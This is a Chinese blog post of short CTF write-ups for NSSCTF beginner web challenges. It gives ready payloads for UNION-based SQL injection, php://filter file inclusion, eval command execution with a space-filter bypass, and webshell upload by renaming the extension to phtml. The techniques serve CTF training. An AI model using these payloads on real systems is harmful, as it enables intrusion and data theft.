首页 > 其他分享 >nss第一页

nss第一页

时间:2024-08-29 15:27:51浏览次数:9  
标签:php name SWPUCTF 这题 json 2021 第一页 nss

1、[SWPUCTF 2021 新生赛]gift_F12
这题flag藏在前端的源码里,只需要查看源码就好了

最后改成题目所需要的flag形式

2、[SWPUCTF 2021 新生赛]jicao

打开这题,这题是一个php代码审计的题目,然后的话,这里主要来看一下 json_decode 这个函数,
首先这个函数接收两个参数
第一个参数:带解码的JSON字符串
第二个参数:是一个布尔值(默认设置为false),当为true时候,将JSON对象解码为关联数组;当为false的时候结尾为php对象
例如:
$json = json_decode('{"name":"John","age":30}', true);
当第二个参数为true时候,经过json_decode后 :——>Array( [name] => John [age] => 30)
$json = json_decode('{"name":"John","age":30}', false);
当第二个参数为false时候,就得到一个php类,此时就可以通过类调用成员属性,如$ json->name=John

最后的payload:
GET:json={"x":"wllm"}
POST:id=wllmNB

3、[SWPUCTF 2021 新生赛]easy_md5

看到md5就直接用数组绕过了,注意传参方式就行了
payload:
GET:name[]=1
POST:password[]=12
4、[SWPUCTF 2021 新生赛]include

开始提示传一个file进去,用file作为参数然后用get请求传进去就来到上面这个页面
最后看到一个 include_once 函数,就知道要文件包含了,
data协议我用了好像没有反应,最后用?file=php://filter就出来了,最后拿去base64解码
payload:GET:file=php://filter/read=convert.base64-encode/resource=flag.php

5、[SWPUCTF 2021 新生赛]easy_sql
这题是一道sql注入,额,过滤了#号,用--+代替就行了,其他都是常规操作
-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()--+
test_tb,users

-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='test_tb'--+
id,flag

-1' union select 1,2,flag from test_tb

6、[SWPUCTF 2021 新生赛]easyrce

通过url控制eval的参数,所有直接执行系统命令,传入
system('ls /');
payload:?url=system('cat /flllllaaaaaaggggggg');

7、[SWPUCTF 2021 新生赛]caidao
这题打开有个一句话木马,直接蚁剑连接,也可以通过命令执行来拿flag

8、[SWPUCTF 2021 新生赛]Do_you_know_http
这题用bp抓包,然后改user-agent 和 X-Forwarded-For就行了

9、[LitCTF 2023]我Flag呢?
这题直接查看源码就出来了

10、[SWPUCTF 2021 新生赛]babyrce

跟着题目来,在http头传一个cookie:amdin=1(注意cookie中的参数之间用分号隔开),接着就出现了下面这个页面

访问rasalghul.php

最后有个命令执行函数,参数过滤了空格,使用 ${IFS}或者%09绕过空格就行了
最后的payload:rasalghul.php?url=cat%09/flllllaaaaaaggggggg

11、 [第五空间 2021]WebFTP
这用御剑扫描出来了phpinfo.php
然后访问这个文件,最后搜索关键字,nssctf就可以看到flag了·

12、[SWPUCTF 2021 新生赛]easyupload2.0
这题的话直接在文件里放一个马,然后文件名过滤了php后缀,直接改成phtml就行了
最后用蚁剑连接

13、[LitCTF 2023]PHP是世界上最好的语言!!
这题直接复制输出内容就行了

如果有不成功的话就写入

13、[SWPUCTF 2021 新生赛]easyupload1.0

传马:

改后缀,最后访问
/upload/2.php
命令执行
post:
1=system('cat /var/www/html/flag.php');

标签:php,name,SWPUCTF,这题,json,2021,第一页,nss
From: https://www.cnblogs.com/lcmz/p/18386772

相关文章

  • OpenSSH 存在输入验证错误漏洞(CVE-2019-16905) 解决
    1、下载文件:zlib-1.2.11.tar.gzopenssh-8.3p1.tar.gzopenssl-1.1.1g.tar.gz 2、解压升级包tar--no-same-owner-zxvfzlib-1.2.11.tar.gztar--no-same-owner-zxvfopenssh-8.3p1.tar.gztar--no-same-owner-zxvfopenssl-1.1.1g.tar.gz 3、编译安装zlibcdzli......
  • NSSCTF [NISACTF 2022]babyserialize
    <?phpinclude"waf.php";classNISA{public$fun="show_me_flag";public$txw4ever;//1shellpublicfunction__wakeup(){if($this->fun=="show_me_flag"){hint();}}......
  • 【GNSS射频前端】MA2769初识
    MAX2769芯片概述:MAX2769是一款单芯片多系统GNSS接收器,采用Maxim的低功耗SiGeBiCMOS工艺技术。集成了包括双输入低噪声放大器(LNA)、混频器、图像拒绝滤波器、可编程增益放大器(PGA)、压控振荡器(VCO)、分数-N频率合成器等在内的完整接收链。主要特点:支持GPS、GLONASS和Gal......
  • 在CentOS7.9上 编译安装openssl-3.3.1+编译安装Nginx1.26.2
    编译安装注意事项知识点一:openssl的重要性openssl在Linux系统中扮演着至关重要的角色,尤其是在网络安全方面。许多服务和应用程序都依赖于openssl提供的加密功能,包括但不限于web服务器(如Apache和Nginx)、数据库服务器(如MySQL和PostgreSQL)、邮件服务器、VPN等。以下......
  • NSSCTF [HNCTF 2022 Week1]Interesting_include
    <?php//WEB手要懂得搜索//flagin./flag.phpif(isset($_GET['filter'])){$file=$_GET['filter'];if(!preg_match("/flag/i",$file)){die("error");}include($file);}else{highlight_file(__......
  • 升级Openssh 后 最大文件打开数修改不生效,启动 UsePAM yes后 ,最大文件打开数生效但是
    感谢 博主https://blog.csdn.net/Daphnisz/article/details/124040904vi /etc/pam.d/sshd(注意不是/etc/pam.d/sshd.pam)#%PAM-1.0auth required pam_sepermit.soauthsubstackpassword-authauthincludepostlogin#Usedwithpolkittoreauthor......
  • cmake openssl 生成失败
    生成azerothcode的时候报错,改成1.x版本就好了,我用的1.1.1。CMakeErroratE:/Soft/CMake326/share/cmake-3.26/Modules/FindPackageHandleStandardArgs.cmake:230(message):CouldNOTfindOpenSSL,trytosetthepathtoOpenSSLrootfolderinthesystemvariableOPEN......
  • openssh版本更新与说明 openssl版本更新与说明
    openssh版本截止到当前,官网最新的openssh稳定版本为 OpenSSH9.8/9.8p1 (2024-07-01)OpenSSH:ReleaseNotes基本主版本官方合作的镜像网站列表:OpenSSH:Mirrors可移植版官方合作的镜像网站列表:OpenSSH:PortableRelease版本区别OpenSSH9.8/9.8p1这是官方原文说明:Op......
  • NSSCTF [SWPUCTF 2021 新生赛]crypto8
    开启环境,什么东西?只有一个文件???那就先下载下来看看73E-30U1&>V-H965S95]I<U]P;W=E<GT`这样一串字符,没有网页,只有文件,那肯定是用某种加密方式加密之后的结果。但是这个形式的加密是真没见过,才疏学浅,只能先上网取经了。看了这篇大佬的文章大佬说是UUencode编码,先去找个解码器试......
  • OpenSSH升级至9.8p
    一、现有环境[root@localhost/]#ssh-VOpenSSH_7.4p1,OpenSSL1.0.2k-fips26Jan2017二、安装openssl(要求>=1.1.1,如果已经符合跳过此节操作)下载openssl-1.1.1w.tar.gz编译安装openssltar-xzvfopenssl-1.1.1w.tar.gzcdopenssl-1.1.1w/./config--prefix=/usrmake&&......